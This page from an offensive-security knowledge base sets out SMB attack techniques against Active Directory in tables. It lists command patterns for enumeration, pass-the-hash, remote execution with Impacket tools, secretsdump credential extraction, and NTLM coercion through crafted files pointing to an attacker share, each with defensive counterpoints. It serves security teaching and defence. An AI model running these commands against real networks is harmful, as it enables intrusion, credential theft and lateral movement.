Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / SMB

Matrix

SMB primitiveWhat it tells usMain toolsCommand patternOffensive valueDefensive focus
Host probeSMB service, OS, domain, signingnxc, nmapnxc smb 10.10.10.0/24Find Windows hosts and relay candidates445 scanning, host discovery patterns
Signing checkWhether SMB relay to target is blockednxc, nmapnxc smb hosts.txt --gen-relay-list targets.txtBuild relay target listRequire SMB signing
Null sessionAnonymous SMB/RPC exposuresmbclient, rpcclient, enum4linux-ngsmbclient -N -L //targetUsers, groups, shares without credsDisable anonymous enumeration
Guest accessGuest-enabled shares or RPCsmbmap, smbclient, nxcsmbmap -u guest -p '' -H targetLow-friction file accessDisable Guest and audit share ACLs
Share enumerationShare names and permissionsnxc, smbmap, smbclientnxc smb target -u user -p pass --sharesFind readable and writable data paths5140 and 5145 events
RPC enumerationDomain SID, users, groups, password policyrpcclient, samrdump.pyrpcclient -U '' target -c lsaqueryUsername discovery and RID cyclingSAMR restrictions and RPC monitoring
File huntingInteresting files inside sharesSnaffler, PowerHuntShares, smbmapSnaffler.exe -d ootw.local -s -v dataCredentials, configs, keys, scriptsSensitive data governance
File operationsUpload, download, delete, mountsmbclient, smbmap, mount.cifssmbclient //target/share -U user%pass -c "get file"Looting and stagingFile auditing and share write review
File-triggered NTLM coercionWhether users can be made to resolve attacker UNC paths from filesResponder, ntlmrelayx.py, crafted files.library-ms, .lnk, .scf, .url, .svg referencing \\attacker\shareNetNTLMv2 capture or relay sourceWritable share review, outbound SMB controls, suspicious file extensions
Credential validationPassword, hash, ticket validationnxc, smbclient, Impacketnxc smb target -u user -p passFind working creds and admin rights4624, 4625, lockout telemetry
Pass-the-HashAuthenticate with NTLM hashnxc, Impacketnxc smb target -u user -H NTLMLateral movement without plaintextNTLM reduction and admin isolation
Kerberos over SMBUse CIFS ticket or TGTsmbclient, psexec.py, nxcsmbclient -k //host/C$Ticket-based SMB accessKerberos service ticket review
Remote executionExecute command as adminpsexec.py, wmiexec.py, smbexec.py, atexec.py, nxcwmiexec.py domain/user:pass@targetHost compromise and lateral movement7045, 4697, scheduled task and WMI logs
Secrets dumpSAM, LSA, NTDS when adminsecretsdump.py, nxcsecretsdump.py domain/user:pass@targetLocal or domain credential extractionLSASS, registry hive, NTDS access
SMB stagingHost attacker SMB sharesmbserver.pysmbserver.py -smb2support loot .Payload transfer and UNC coercion testingOutbound SMB controls

File-trigger matrix

TriggerWhat causes authenticationTypical placementResultCaveat
.library-msWindows library location points to attacker UNC pathZip, writable share, extracted folderSMB/WebDAV authentication to attackerNeeds browse, extract, open, or indexing behavior
.lnkShortcut target or icon path references attacker UNC pathShare folder, desktop, archiveSMB authentication to attackerExtension may be hidden in Explorer
.scfShell icon path references attacker UNC pathWritable shareSMB authentication when folder is browsedVersion-dependent and unreliable on newer servers
.urlURL shortcut references remote file or iconShare folder or archiveSMB or HTTP authentication depending on targetClient behavior varies
.svg or .htmlEmbedded resource references attacker UNC pathUpload, share, preview pathSMB authentication when rendered or previewedDepends on renderer and preview settings
Office remote templateTemplate or external relationship points to remote pathDocument delivery or shareSMB/WebDAV authenticationProtected View and hardening may block follow-up

Common shares

ShareMeaningNormal accessOffensive value
IPC$Named pipes and RPCAuthenticated or anonymous depending on policyRPC enumeration, remote management plumbing
ADMIN$C:\Windows admin shareLocal administratorsService staging, PsExec-style execution
C$System drive admin shareLocal administratorsFile access, loot, staging
SYSVOLDomain policy filesDomain users readGPO review, scripts, policy artifacts
NETLOGONLogon scriptsDomain users readScripts, legacy creds, logon behavior
UsersUser profile shareDepends on ACLDocuments, desktop files, configs
ITIT operational shareHelpdesk or ITScripts, installers, credentials
FinanceBusiness dataDepartment ACLSensitive documents
BackupsBackup dataBackup operators or service accountsCredential material, database dumps

Remote execution matrix

ToolTransportRequirementOutput styleMain artifact
psexec.pySMB and SCMLocal adminInteractive shellService creation and binary drop
smbexec.pySMB and serviceLocal adminSemi-interactiveService creation and script artifacts
wmiexec.pySMB plus WMI/DCOMLocal admin and WMI allowedCommand shellWMI/DCOM activity, SMB output channel
atexec.pySMB plus Task SchedulerLocal adminOne-shot outputScheduled task events
nxc smb -xSMB execution backendLocal adminCommand outputDepends on selected exec method